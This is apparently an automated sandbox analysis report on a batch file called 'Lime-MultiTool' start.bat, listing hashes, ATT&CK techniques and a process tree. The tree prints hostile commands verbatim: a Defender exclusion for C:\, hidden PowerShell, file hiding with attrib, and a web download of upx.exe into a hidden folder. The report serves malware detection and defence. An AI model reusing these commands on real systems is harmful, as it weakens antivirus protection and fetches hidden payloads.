d595ab589662812007b211536b921b25367411546fbda83d33fa7ef29e9e7d6c

Resubmissions

06-01-2025 02:41

250106-c6ynvstla1 10

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
06-01-2025 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Lime-MultiTool-main/start.bat
Size

30KB
MD5

288f9aa2144276b6994dbf5a69a8da59
SHA1

b860a86ca3c2b0bcd752c05a15d5bd745dfc506a
SHA256

dd9995205fe2cc6e42086f40327f1aa9a725d2912c7ce2d4cf0839d24baeafb4
SHA512

1b47bd833f192d7d7d014872f5cd8be54168a609cc50200dd9c2f290fae2185b8ef54e1fa47d3ca51fe158b294130c74913789781fedc5e1ab60b9a46e09d15f
SSDEEP

48:92ros7BK7cp3zI8FpIJp/4eai2gF9H2YHwvfol2+:92O4dI8ihXf

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1056	powershell.exe
2696	powershell.exe
2784	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2784	powershell.exe
2696	powershell.exe
1056	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2380	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2380	AcroRd32.exe
2380	AcroRd32.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3040 wrote to memory of 1760	3040	cmd.exe	31
PID 3040 wrote to memory of 1760	3040	cmd.exe	31
PID 3040 wrote to memory of 1760	3040	cmd.exe	31
PID 3040 wrote to memory of 2876	3040	cmd.exe	32
PID 3040 wrote to memory of 2876	3040	cmd.exe	32
PID 3040 wrote to memory of 2876	3040	cmd.exe	32
PID 3040 wrote to memory of 2784	3040	cmd.exe	33
PID 3040 wrote to memory of 2784	3040	cmd.exe	33
PID 3040 wrote to memory of 2784	3040	cmd.exe	33
PID 3040 wrote to memory of 2816	3040	cmd.exe	34
PID 3040 wrote to memory of 2816	3040	cmd.exe	34
PID 3040 wrote to memory of 2816	3040	cmd.exe	34
PID 3040 wrote to memory of 2696	3040	cmd.exe	35
PID 3040 wrote to memory of 2696	3040	cmd.exe	35
PID 3040 wrote to memory of 2696	3040	cmd.exe	35
PID 3040 wrote to memory of 1064	3040	cmd.exe	36
PID 3040 wrote to memory of 1064	3040	cmd.exe	36
PID 3040 wrote to memory of 1064	3040	cmd.exe	36
PID 3040 wrote to memory of 1056	3040	cmd.exe	37
PID 3040 wrote to memory of 1056	3040	cmd.exe	37
PID 3040 wrote to memory of 1056	3040	cmd.exe	37
PID 3040 wrote to memory of 2968	3040	cmd.exe	38
PID 3040 wrote to memory of 2968	3040	cmd.exe	38
PID 3040 wrote to memory of 2968	3040	cmd.exe	38
PID 2876 wrote to memory of 2380	2876	rundll32.exe	39
PID 2876 wrote to memory of 2380	2876	rundll32.exe	39
PID 2876 wrote to memory of 2380	2876	rundll32.exe	39
PID 2876 wrote to memory of 2380	2876	rundll32.exe	39

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2968	attrib.exe
1064	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3040
- C:\Windows\system32\mode.com
  mode con: cols=100 lines=30
  2⤵
  PID:1760
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\main.py
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\main.py"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:1064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
c8a84bc910330f8ec453166a02c87260

SHA1
48821b91533e2e1c359a8c986698993ee6bdacca

SHA256
b58f5f4813e6e567b562c77d5abfd847b2376b0fd2e99101b46b553646b78727

SHA512
83fbaae9d84755e8c9cfd5e23f9954be2951e74eff2dfa383056caa0b1264ec2af15ce075c2170ca2814b001215dc5751c985a5b033a0b4b972b95d97dfa896a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5a4ee79b15e8fe26b266c0adb33e95f2

SHA1
a5491c9d2faba49283b43dddcb3cafa3c37c3e69

SHA256
c936379d167316d450fcbb33e3a32d7a8752a51f0e43a631f44f6cb9617edc69

SHA512
d0f42dbdbd683eb7bc077f5df88c816227fb14039ba060fc93437558cb994f0d766878b3e3816422a0da8ff3471baaac5a1203fddf06467c683104c66aa9d3ce

Download Submit
memory/2696-36-0x00000000025E0000-0x00000000025E8000-memory.dmp

Filesize
32KB

Download
memory/2696-35-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/2784-29-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2784-28-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download